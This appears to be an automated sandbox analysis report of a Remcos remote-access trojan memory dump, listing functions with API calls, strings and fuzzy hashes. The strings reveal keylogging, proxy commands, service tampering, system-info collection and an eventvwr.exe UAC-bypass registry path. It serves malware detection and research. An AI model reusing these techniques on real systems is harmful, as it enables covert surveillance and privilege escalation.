                                      • Part of subcall function 007101F5: GetLastError.KERNEL32(?,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?,?), ref: 0071021D
                                    • _free.LIBCMT ref: 00711C0E
                                    • _free.LIBCMT ref: 00711C19
                                    • _free.LIBCMT ref: 00711C24
                                    • _free.LIBCMT ref: 00711C2F
                                    • _free.LIBCMT ref: 00711C3A
                                    • _free.LIBCMT ref: 00711C45
                                    • _free.LIBCMT ref: 00711C50
                                    • _free.LIBCMT ref: 00711C5B
                                    • _free.LIBCMT ref: 00711C69
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 9735cf8cc7062d9dbd771a740f023478b474e5e95306c8de554a4d61fd67fc52
                                    • Instruction ID: 8b57a8318d16988cc34458958dab9ae16fc1bdfb4621d4bfbc29a9793630fc6b
                                    • Opcode Fuzzy Hash: 9735cf8cc7062d9dbd771a740f023478b474e5e95306c8de554a4d61fd67fc52
                                    • Instruction Fuzzy Hash: 4F119276140148FFCB01EF98CD46CDD3BA5FF05350B4141A5BB088F2A2DA79DAD4AB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E23B9, Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 458COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CountEventTick
                                    • String ID: 8Em
                                    • API String ID: 180926312-1798622111
                                    • Opcode ID: 0569f408aee004c92c4b9f63e9b71bc6090620c56ec3ddfc546ed20e778f283d
                                    • Instruction ID: 2522be147737a0eb02d24dcde017389a59e46cd765e7c358ade627ce9db84dc1
                                    • Opcode Fuzzy Hash: 0569f408aee004c92c4b9f63e9b71bc6090620c56ec3ddfc546ed20e778f283d
                                    • Instruction Fuzzy Hash: 64E19531A08340ABC694FB71DC67AAE73AB9F55300F40091EF5469B3D2EE749E09C75A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E5938, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 006E593D
                                    • GdiplusStartup.GDIPLUS(0073BEA0,?,00000000), ref: 006E596F
                                      • Part of subcall function 006D7514: char_traits.LIBCPMT ref: 006D752F
                                      • Part of subcall function 006E576E: DeleteFileW.KERNEL32(00000000,0000001B), ref: 006E5858
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 006E59FB
                                    • Sleep.KERNEL32(000003E8), ref: 006E5A81
                                    • GetLocalTime.KERNEL32(?), ref: 006E5A89
                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 006E5B78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$CreateDeleteDirectoryFileGdiplusH_prologLocalStartupTimechar_traits
                                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                    • API String ID: 649275306-3790400642
                                    • Opcode ID: a0c76565e4d71797c09a6465085b479d6a4128af34d115884f05192476e56a17
                                    • Instruction ID: 08f96a706f4b0bd737838c899b2740e56b8f766f0865a4049c01f34af6ca1ef6
                                    • Opcode Fuzzy Hash: a0c76565e4d71797c09a6465085b479d6a4128af34d115884f05192476e56a17
                                    • Instruction Fuzzy Hash: 7851C471E00258AADB54FBB5DC669FD77ABAF45300F00002EF906AB292DF785E45C764
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0071FB34, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                    Download Yara Rule
                                    APIs
                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0072067F), ref: 0071FB57
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: DecodePointer
                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                    • API String ID: 3527080286-3064271455
                                    • Opcode ID: da4bc6b017a7fbe3e197ce8c63c479a6e40acfbd92331369560c8df70281b858
                                    • Instruction ID: 29126527d0c47a74e4177e818be0287ff6353692799dff2d8496599d37c34807
                                    • Opcode Fuzzy Hash: da4bc6b017a7fbe3e197ce8c63c479a6e40acfbd92331369560c8df70281b858
                                    • Instruction Fuzzy Hash: 9B519EB090460DDBCF10DF6CE9585ECBBB4FF49310F6041A9D881A6294CB3D8EA5DB69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00714B6E, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,007152E3,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00714BB0
                                    • __fassign.LIBCMT ref: 00714C2B
                                    • __fassign.LIBCMT ref: 00714C46
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00714C6C
                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,Rq,00000000,?,?,?,?,?,?,?,?,?,007152E3,?), ref: 00714C8B
                                    • WriteFile.KERNEL32(?,?,00000001,Rq,00000000,?,?,?,?,?,?,?,?,?,007152E3,?), ref: 00714CC4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID: Rq
                                    • API String ID: 1324828854-1270803168
                                    • Opcode ID: 6e9f6a8aa2fb1a5a1321c62966a2af273a6e2c98c2ce21e218fe9385f5d4223e
                                    • Instruction ID: f5320617d77ee2f7b22331413019918602aab619bfb4fe59867804560ed73100
                                    • Opcode Fuzzy Hash: 6e9f6a8aa2fb1a5a1321c62966a2af273a6e2c98c2ce21e218fe9385f5d4223e
                                    • Instruction Fuzzy Hash: FB51D671A00249AFDF10CFA8D885AEEBBF9FF09310F14415AE555E7291E738D981CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E3673, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112sleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006D9E69: char_traits.LIBCPMT ref: 006D9E79
                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 006E36D4
                                      • Part of subcall function 006E79DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,006D4230,0072F464), ref: 006E79F9
                                    • Sleep.KERNEL32(00000064), ref: 006E3700
                                    • DeleteFileW.KERNEL32(00000000), ref: 006E3734
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                    • API String ID: 2701014334-2001430897
                                    • Opcode ID: afc8b103456175f2c2a514b41b9cbf8c0ae63f5f1794d6b7923c8709c0ca4ee2
                                    • Instruction ID: b8d5ee036dcbf2c7cb99e70bd4ea5d4e32e3909ba18e697149ce34af943d1d6a
                                    • Opcode Fuzzy Hash: afc8b103456175f2c2a514b41b9cbf8c0ae63f5f1794d6b7923c8709c0ca4ee2
                                    • Instruction Fuzzy Hash: 5F316171D10219ABCB54FBA4DC96EEEB777AF11300F40002EF9056B292EF745E4AC699
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DEAF4, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006DEB01
                                    • int.LIBCPMT ref: 006DEB14
                                      • Part of subcall function 006DB94C: std::_Lockit::_Lockit.LIBCPMT ref: 006DB95D
                                      • Part of subcall function 006DB94C: std::_Lockit::~_Lockit.LIBCPMT ref: 006DB977
                                    • std::locale::_Getfacet.LIBCPMT ref: 006DEB1D
                                    • std::_Facet_Register.LIBCPMT ref: 006DEB54
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006DEB5D
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006DEB7B
                                    • std::exception::exception.LIBCMT ref: 006DEB8A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::exception::exceptionstd::locale::_
                                    • String ID: Ym
                                    • API String ID: 2287991272-3512172532
                                    • Opcode ID: 381f84055ebbb3857c88a2da1777d55f002ad74782dccf080102d5fc43ea76e4
                                    • Instruction ID: e3a62b64f96398d2a7f6b05d4bb5a02c14ab3e6d0835e1ac3782572ba1eaf8d0
                                    • Opcode Fuzzy Hash: 381f84055ebbb3857c88a2da1777d55f002ad74782dccf080102d5fc43ea76e4
                                    • Instruction Fuzzy Hash: C611C432D00218EBCB10BB94E905AEEB7A99F40760F11016BF9056B391DF75AE0187D4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D8892, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 006D88AD
                                    • SetWindowsHookExA.USER32 ref: 006D88BB
                                    • GetLastError.KERNEL32 ref: 006D88C7
                                      • Part of subcall function 006E6C80: GetLocalTime.KERNEL32(00000000), ref: 006E6C9A
                                    • GetMessageA.USER32 ref: 006D8915
                                    • TranslateMessage.USER32(?), ref: 006D8924
                                    • DispatchMessageA.USER32 ref: 006D892F
                                    Strings
                                    • Keylogger initialization failure: error , xrefs: 006D88DB
                                    • [ERROR], xrefs: 006D88ED
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                    • String ID: Keylogger initialization failure: error $[ERROR]
                                    • API String ID: 3219506041-2451335947
                                    • Opcode ID: 0644fffc4bc49a3d89281f8edac539d1631b360940430fb9157f2d990f7881b3
                                    • Instruction ID: cacfd9bdf4fd1e2a85613b619a50465ddf04a3ccb948507b70dc687f1432223c
                                    • Opcode Fuzzy Hash: 0644fffc4bc49a3d89281f8edac539d1631b360940430fb9157f2d990f7881b3
                                    • Instruction Fuzzy Hash: 4F119471A00241AFC720BB7AAC1DC6B77EDEB95711B10462EF495C3251EF78DA01C766
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E8D28, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 006E8D41
                                      • Part of subcall function 006E8DDA: RegisterClassExA.USER32(00000030), ref: 006E8E26
                                      • Part of subcall function 006E8DDA: CreateWindowExA.USER32 ref: 006E8E41
                                      • Part of subcall function 006E8DDA: GetLastError.KERNEL32 ref: 006E8E4B
                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 006E8D78
                                    • lstrcpynA.KERNEL32(0073BED8,Remcos,00000080), ref: 006E8D92
                                    • Shell_NotifyIconA.SHELL32(00000000,0073BEC0), ref: 006E8DA8
                                    • TranslateMessage.USER32(?), ref: 006E8DB4
                                    • DispatchMessageA.USER32 ref: 006E8DBE
                                    • GetMessageA.USER32 ref: 006E8DCB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                    • String ID: Remcos
                                    • API String ID: 1970332568-165870891
                                    • Opcode ID: 3745711452e4726e0e4b316ed06f9d3615478fb5cb323c5bba5c2c2592d0d723
                                    • Instruction ID: 89991f6629247461964744c124b0ed003138028de80d081470a2d9476e3ca579
                                    • Opcode Fuzzy Hash: 3745711452e4726e0e4b316ed06f9d3615478fb5cb323c5bba5c2c2592d0d723
                                    • Instruction Fuzzy Hash: B1011272540248ABE7209FA9EC0DEDB7BBCFB85705F008019F745921A1DBBC96468B58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00716532, Relevance: 13.8, APIs: 9, Instructions: 300COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8e6f053fb3ecea3a6bff7ca692211b1739d4e07f7261cf961c6266acdab82d5a
                                    • Instruction ID: 7cef4feb98f252f6ce0630acdfaed434c7337ed8b918d584a8c9dc9d1345b116
                                    • Opcode Fuzzy Hash: 8e6f053fb3ecea3a6bff7ca692211b1739d4e07f7261cf961c6266acdab82d5a
                                    • Instruction Fuzzy Hash: B6C19BB4A04249EFDB11DFACC845BEDBBF4AF09314F148198EA14A72D2D77C9981CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0071E8D5, Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0071EBAE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0071E981
                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0071EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0071EA04
                                    • __alloca_probe_16.LIBCMT ref: 0071EA3C
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0071EBAE,?,0071EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0071EA97
                                    • __alloca_probe_16.LIBCMT ref: 0071EAE6
                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0071EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0071EAAE
                                      • Part of subcall function 0070F98C: HeapAlloc.KERNEL32(00000000,?,?,?,006FF244,?,?,006D1696,?,?,?,?,?), ref: 0070F9BE
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0071EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0071EB2A
                                    • __freea.LIBCMT ref: 0071EB55
                                    • __freea.LIBCMT ref: 0071EB61
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                    • String ID:
                                    • API String ID: 3256262068-0
                                    • Opcode ID: 1f137ba2c5c8a2aa7c6acbf037d052f8e3c91deb88c42cc08a275773459e9ce9
                                    • Instruction ID: c151c6c4ad207c057b653675a8ee5e43ffbc61dacafade30828e918180f4d6df
                                    • Opcode Fuzzy Hash: 1f137ba2c5c8a2aa7c6acbf037d052f8e3c91deb88c42cc08a275773459e9ce9
                                    • Instruction Fuzzy Hash: D591A371E042169ADF348A68CC85EEEBBB5AF09710F184669ED05E71C1E73DECC187A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070E9CE, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00711CE2: GetLastError.KERNEL32(00000000,?,00705545,?,?,?,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711CE6
                                      • Part of subcall function 00711CE2: _free.LIBCMT ref: 00711D19
                                      • Part of subcall function 00711CE2: SetLastError.KERNEL32(00000000,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711D5A
                                      • Part of subcall function 00711CE2: _abort.LIBCMT ref: 00711D60
                                    • _memcmp.LIBVCRUNTIME ref: 0070EC78
                                    • _free.LIBCMT ref: 0070ECE9
                                    • _free.LIBCMT ref: 0070ED02
                                    • _free.LIBCMT ref: 0070ED34
                                    • _free.LIBCMT ref: 0070ED3D
                                    • _free.LIBCMT ref: 0070ED49
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorLast$_abort_memcmp
                                    • String ID: C
                                    • API String ID: 1679612858-1037565863
                                    • Opcode ID: 4510d9ac6f88dada72703526d80e98ff3185ed8a25d501e721f8360f424ea500
                                    • Instruction ID: 30260221bf158797dac98f7448b2c51f5f0058db78c19f7709840d4c7f7bfe7a
                                    • Opcode Fuzzy Hash: 4510d9ac6f88dada72703526d80e98ff3185ed8a25d501e721f8360f424ea500
                                    • Instruction Fuzzy Hash: 30B12E75A01219DFDB24DF18C888AADB7F4FF48304F148AAAD549A7390D739AE90CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DEEA8, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 189COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Eventinet_ntoa
                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                    • API String ID: 3578746661-168337528
                                    • Opcode ID: d8886bbf54760de4c3b78ea5733148e9c179dfe9677575d940cdcf6194a15aa4
                                    • Instruction ID: 77242ab7b00a2527488db408dfd72dac13f9adc2b63f2036e7926efbf7fb7a5b
                                    • Opcode Fuzzy Hash: d8886bbf54760de4c3b78ea5733148e9c179dfe9677575d940cdcf6194a15aa4
                                    • Instruction Fuzzy Hash: BC51E231F04300ABD744BB34D82AA6E36A79B85300F40452FF9469B7E2EF798905C79A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E3D1B, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006E3F68: __EH_prolog.LIBCMT ref: 006E3F6D
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,0072F6BC), ref: 006E3E18
                                    • CloseHandle.KERNEL32(00000000), ref: 006E3E21
                                    • DeleteFileA.KERNEL32(00000000), ref: 006E3E30
                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 006E3DE4
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                    • String ID: <$@$Temp
                                    • API String ID: 1704390241-1032778388
                                    • Opcode ID: ca9003163eff6d7be700b697299da8407b471492b11fe9b8545b55da4ce843be
                                    • Instruction ID: 358f12be5267787130fc4875ad0b16ddb8ecb4f4a60125d15fca93af5a7a1e93
                                    • Opcode Fuzzy Hash: ca9003163eff6d7be700b697299da8407b471492b11fe9b8545b55da4ce843be
                                    • Instruction Fuzzy Hash: 9E417131D00219ABDB54FB64DC56AFDB7B6AF11300F40426EF1056A2E2EF741B86CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D62D8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006D7514: char_traits.LIBCPMT ref: 006D752F
                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 006D6331
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 006D6379
                                    • CloseHandle.KERNEL32(00000000), ref: 006D63B3
                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 006D63CB
                                    • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 006D63EF
                                    • DeleteFileW.KERNEL32(00000000), ref: 006D63FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                                    • String ID: .part
                                    • API String ID: 820096542-3499674018
                                    • Opcode ID: 4199b72223aee2ff4acafebd4d6371ca83b7213b6ba2d457eae6ad4c462e5799
                                    • Instruction ID: 22f6bf9db1903fe605fda453406b6332e3f9c1daa807e8672940ba0b70190f8a
                                    • Opcode Fuzzy Hash: 4199b72223aee2ff4acafebd4d6371ca83b7213b6ba2d457eae6ad4c462e5799
                                    • Instruction Fuzzy Hash: FB313871D00219ABCB14EFA4DC969EEB77AFF08311F10856AF811A7251DB746F48CB68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D5F77, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 78COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,0072F724,0072F724,00000000), ref: 006D6046
                                    • ExitProcess.KERNEL32 ref: 006D6053
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteExitProcessShell
                                    • String ID: Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                    • API String ID: 1124553745-3923289169
                                    • Opcode ID: 1e695b9f541a07d19126c9b101bd6c66069c21310b94b3e9573b97e68bdcd4e0
                                    • Instruction ID: 31479347104afe414a6c181fe9695eff12aae06742237ba6a8212daf1a3e902e
                                    • Opcode Fuzzy Hash: 1e695b9f541a07d19126c9b101bd6c66069c21310b94b3e9573b97e68bdcd4e0
                                    • Instruction Fuzzy Hash: B31105A1E442107BE754B7A0EC17FBF36AB9B11700F10003EF406AA3C2EE98194582EA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E65DD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,006E5D21,00000000), ref: 006E65ED
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,006E5D21,00000000), ref: 006E6601
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,006E5D21,00000000), ref: 006E660E
                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,006E5D21,00000000), ref: 006E6643
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,006E5D21,00000000), ref: 006E6655
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,006E5D21,00000000), ref: 006E6658
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                    • String ID: !]n
                                    • API String ID: 493672254-1674680963
                                    • Opcode ID: 28793e8bac5c5eda9e821e9128cb2f67f676024a12cc282b2b2a9e6fec512e31
                                    • Instruction ID: 6332a9223e999194207109f17ffde820da59e00b7142270da4e44f9eb247941f
                                    • Opcode Fuzzy Hash: 28793e8bac5c5eda9e821e9128cb2f67f676024a12cc282b2b2a9e6fec512e31
                                    • Instruction Fuzzy Hash: 1C016D315962553AD2304B39DC0EEBB3B6EDB523F0F004309F925D72C1DA688F0691BA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E650F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,006E5F36,00000000), ref: 006E651E
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,006E5F36,00000000), ref: 006E6532
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5F36,00000000), ref: 006E653F
                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,006E5F36,00000000), ref: 006E654E
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5F36,00000000), ref: 006E6560
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5F36,00000000), ref: 006E6563
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID: 6_n
                                    • API String ID: 221034970-1217285620
                                    • Opcode ID: 7516a2ae45a56e37b88e25f94f825126c96d7bae95c4c94eb9863f157c962f52
                                    • Instruction ID: d6208c3767002402aacdc058fc0b0cb6d4eb9b0813d7c34ac0d73071208b949b
                                    • Opcode Fuzzy Hash: 7516a2ae45a56e37b88e25f94f825126c96d7bae95c4c94eb9863f157c962f52
                                    • Instruction Fuzzy Hash: FFF0F071A412187BD230AB65AC49EBF3B6EDB45390F00401AFE0996241EF7C8E0796F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E63AD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,006E6033,00000000), ref: 006E63B9
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,006E6033,00000000), ref: 006E63CD
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,006E6033,00000000), ref: 006E63DA
                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,006E6033,00000000), ref: 006E63E5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,006E6033,00000000), ref: 006E63F7
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,006E6033,00000000), ref: 006E63FA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                    • String ID: 3`n
                                    • API String ID: 276877138-379299107
                                    • Opcode ID: 89fa57c9394baf8a0f8aed933ed8777c2e6d6e622443ee4678cd1237a40ffd18
